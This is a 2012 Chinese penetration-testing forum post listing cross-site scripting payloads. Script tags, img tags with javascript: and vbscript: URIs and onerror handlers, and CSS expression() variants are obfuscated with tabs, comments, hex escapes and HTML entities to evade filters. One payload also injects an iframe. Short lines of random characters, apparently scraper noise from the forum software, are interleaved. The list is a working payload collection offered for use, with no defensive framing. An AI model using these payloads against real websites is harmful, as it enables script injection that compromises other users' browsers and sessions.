中国网络渗透测试联盟
标题:
跨站语句大全
[打印本页]
作者:
admin
时间:
2012-9-13 17:15
标题:
跨站语句大全
<script>alert("跨站")</script> (最常用)
e2 q/ N4 d7 [' g
<img scr=javascript:alert("跨站")></img>
" F: I" Q/ y2 V9 j
<img scr="javascript: alert(/跨站/)></img>
: q, b+ X8 A9 u8 R2 F& J
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
- W0 |: v% `* B4 u
<img scr="#" onerror=alert(/跨站/)></img>
/ Y8 W6 B; n" S/ }4 ]4 G
<img scr="#" style="xss:expression(alert(/xss/));"></img>
5 z7 L1 {3 [8 l2 ?' u
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
+ ?( r" G4 r: }* H) p& `3 e6 v% R g; Y
<img src=vbscript:msgbox ("xss")></img>
! z8 p' V2 o8 V8 K3 ?
<style> input {left:expression (alert('xss'))}</style>
H4 U3 [' E6 M* Y: Q- k) c4 B8 H
<div style={left:expression (alert('xss'))}></div>
" x. w( T! T, y* k
<div style={left:exp/* */ression (alert('xss'))}></div>
: |0 J# m1 B/ x2 a, Q
<div style={left:\0065\0078ression (alert('xss'))}></div>
$ v2 A. c1 R& Y8 D x( O- T
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
2 {- D- w, r1 ^4 K0 v& G6 [ ]
unicode <div style="{left:expRessioN (alert('xss'))}">
; T2 k. q" e# d3 x5 C ]% n6 {7 N
2 R% o# p" i! s0 l# N/ B
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
3 i9 ~1 J) E; Q- `' Z4 r
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2